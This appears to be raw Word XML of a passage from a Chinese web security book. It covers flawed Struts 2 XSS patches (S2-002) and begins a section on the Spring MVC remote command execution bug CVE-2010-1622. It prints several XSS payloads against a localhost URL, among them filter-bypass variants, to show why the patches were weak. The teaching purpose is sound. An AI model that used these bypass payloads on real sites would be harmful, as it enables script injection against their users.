        </w:rPr>
        <w:t>#</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>，这是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t># </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>的十六进制编码，从而构造出可以远程执行的攻击 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>payload</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="137"/>
        <w:ind w:left="623"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>最终导致代码执行成功。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="5"/>
        <w:rPr>
          <w:sz w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1201" w:val="left" w:leader="none"/>
          <w:tab w:pos="1202" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="1" w:after="0"/>
        <w:ind w:left="1201" w:right="0" w:hanging="998"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:w w:val="130"/>
        </w:rPr>
        <w:t>Struts</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
          <w:w w:val="130"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="130"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:w w:val="130"/>
        </w:rPr>
        <w:t> 的问题补丁</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="209"/>
        <w:ind w:left="604"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Struts 2 </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>官方目前公布了几个安全补丁</w:t>
      </w:r>
      <w:hyperlink w:history="true" w:anchor="_bookmark14">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
            <w:vertAlign w:val="superscript"/>
          </w:rPr>
          <w:t>3</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="3"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" allowOverlap="1" layoutInCell="1" locked="0" behindDoc="0" simplePos="0" relativeHeight="4720">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>449580</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>116661</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4629130" cy="2207418"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="35" name="image27.png" descr=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="36" name="image27.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId86" cstate="print"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4629130" cy="2207418"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="1"/>
        <w:ind w:left="0" w:right="15" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Struts 2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>官方的补丁页面</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="11"/>
        <w:rPr>
          <w:sz w:val="17"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="309" w:lineRule="auto"/>
        <w:ind w:left="203" w:right="223" w:firstLine="400"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>但深入其细节不难发现，补丁提交者对于安全的理解是非常粗浅的。以 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>S2-002 </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>的漏洞修补为例，这是一个 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>XSS </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>漏洞，发现者当时提交给官方的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>POC </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>只是构造了 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>script </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>标签。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:pos="8202" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:before="92"/>
        <w:ind w:left="8" w:right="0" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId87">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Courier New"/>
            <w:sz w:val="16"/>
            <w:shd w:fill="DADADA" w:color="auto" w:val="clear"/>
          </w:rPr>
          <w:t>http://localhost/foo/bar.action?&lt;script&gt;alert(1)&lt;/script&gt;test=hell</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
          <w:shd w:fill="DADADA" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t>o</w:t>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="7"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="15"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="623"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>我们看看当时官方是如何修补的：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:rPr>
          <w:sz w:val="14"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:pict>
          <v:line style="position:absolute;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:4744;mso-wrap-distance-left:0;mso-wrap-distance-right:0" from="14.16pt,11.247031pt" to="158.16pt,11.247031pt" stroked="true" strokeweight=".48pt" strokecolor="#000000">
            <v:stroke dashstyle="solid"/>
            <w10:wrap type="topAndBottom"/>
          </v:line>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="8"/>
        <w:rPr>
          <w:sz w:val="12"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="357" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="0" w:after="0"/>
        <w:ind w:left="356" w:right="0" w:hanging="153"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_bookmark14" w:id="79"/>
      <w:bookmarkEnd w:id="79"/>
      <w:r>
        <w:rPr/>
      </w:r>
      <w:hyperlink r:id="rId88">
        <w:bookmarkStart w:name="_bookmark14" w:id="80"/>
        <w:bookmarkEnd w:id="80"/>
        <w:r>
          <w:rPr>
            <w:sz w:val="15"/>
          </w:rPr>
          <w:t>ht</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:sz w:val="15"/>
          </w:rPr>
          <w:t>tp://struts.apache.org/2.x/docs/security-bulletins.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:sectPr>
          <w:pgSz w:w="8740" w:h="14750"/>
          <w:pgMar w:header="930" w:footer="0" w:top="1380" w:bottom="280" w:left="80" w:right="60"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:after="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:sz w:val="15"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="611"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="12.7.3  Spring MVC命令执行漏洞" w:id="81"/>
      <w:bookmarkEnd w:id="81"/>
      <w:r>
        <w:rPr/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4568956" cy="1213103"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="37" name="image28.jpeg" descr=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="38" name="image28.jpeg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId91" cstate="print"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4568956" cy="1213103"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="7"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:sz w:val="15"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="71"/>
        <w:ind w:left="603"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>新增的修补代码：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="3"/>
        <w:rPr>
          <w:sz w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" allowOverlap="1" layoutInCell="1" locked="0" behindDoc="0" simplePos="0" relativeHeight="4768">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>432816</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>181419</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3018559" cy="642937"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="39" name="image29.png" descr=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="40" name="image29.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId92" cstate="print"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3018559" cy="642937"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="10"/>
        <w:rPr>
          <w:sz w:val="23"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:ind w:left="604"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>可以看到，只是简单地替换掉</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>&lt;script&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>标签。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="307" w:lineRule="auto"/>
        <w:ind w:left="203" w:right="223" w:firstLine="400"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>于是有人发现，如果构造 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>&lt;&lt;script&gt;&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>，经过一次处理后会变为 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>&lt;script&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>。漏洞报告给官方后，开发者再次提交了一个补丁，这次将递归处理类似</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>&lt;&lt;&lt;&lt;script&gt;&gt;&gt;&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>的情况。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="6"/>
        <w:rPr>
          <w:sz w:val="9"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" allowOverlap="1" layoutInCell="1" locked="0" behindDoc="0" simplePos="0" relativeHeight="4792">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>432816</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>102107</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4681377" cy="902208"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="41" name="image30.jpeg" descr=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="42" name="image30.jpeg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId93" cstate="print"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4681377" cy="902208"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="9"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="603"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>修补代码仅仅是将 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>if </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>变成 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>while</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" allowOverlap="1" layoutInCell="1" locked="0" behindDoc="0" simplePos="0" relativeHeight="4816">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>432816</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>122526</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3168744" cy="364045"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="43" name="image31.png" descr=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="44" name="image31.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId94" cstate="print"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3168744" cy="364045"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="8"/>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="603"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>这种漏洞修补方式，仍然是存在问题的，攻击者可以通过下面的方法绕过：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="2"/>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:pos="8396" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:before="0"/>
        <w:ind w:left="203" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId87">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Courier New"/>
            <w:spacing w:val="-1"/>
            <w:sz w:val="16"/>
            <w:shd w:fill="DADADA" w:color="auto" w:val="clear"/>
          </w:rPr>
          <w:t>http://localhost/foo/bar.action?&lt;scrip</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="16"/>
          <w:shd w:fill="DADADA" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="16"/>
          <w:shd w:fill="DADADA" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
          <w:shd w:fill="DADADA" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t>test=hello&gt;alert(1)&lt;/script&gt;</w:t>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="15"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="456" w:lineRule="auto"/>
        <w:ind w:left="604" w:right="1674" w:firstLine="19"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>由此可见，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Struts 2 </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>的开发者，本身对于安全的理解是非常不到位的。关于如何正确地防御 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>XSS </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>漏洞，请参考本书的“跨站脚本攻击”一章。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1201" w:val="left" w:leader="none"/>
          <w:tab w:pos="1202" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="106" w:after="0"/>
        <w:ind w:left="1201" w:right="0" w:hanging="998"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:w w:val="125"/>
        </w:rPr>
        <w:t>Spring</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="3"/>
          <w:w w:val="125"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="125"/>
        </w:rPr>
        <w:t>MVC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:w w:val="125"/>
        </w:rPr>
        <w:t> 命令执行漏洞</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="309" w:lineRule="auto" w:before="209"/>
        <w:ind w:left="202" w:right="216" w:firstLine="401"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>2010 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-23"/>
        </w:rPr>
        <w:t>年 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>6 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t>月，公布了 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Spring </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>框架一个远程执行命令漏洞，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>CVE </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-12"/>
        </w:rPr>
        <w:t>编号是 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>CVE-2010-1622</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>。漏洞影响范围如下：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="155"/>
        <w:ind w:left="603"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>SpringSource Spring Framework 3.0.0</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>～</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>3.0.2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:sectPr>
          <w:headerReference w:type="even" r:id="rId89"/>
          <w:headerReference w:type="default" r:id="rId90"/>
          <w:pgSz w:w="8740" w:h="14750"/>
          <w:pgMar w:header="930" w:footer="0" w:top="1380" w:bottom="280" w:left="80" w:right="60"/>
          <w:pgNumType w:start="292"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="144"/>
        <w:ind w:left="604"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>SpringSource Spring Framework 2.5.0</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>～</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
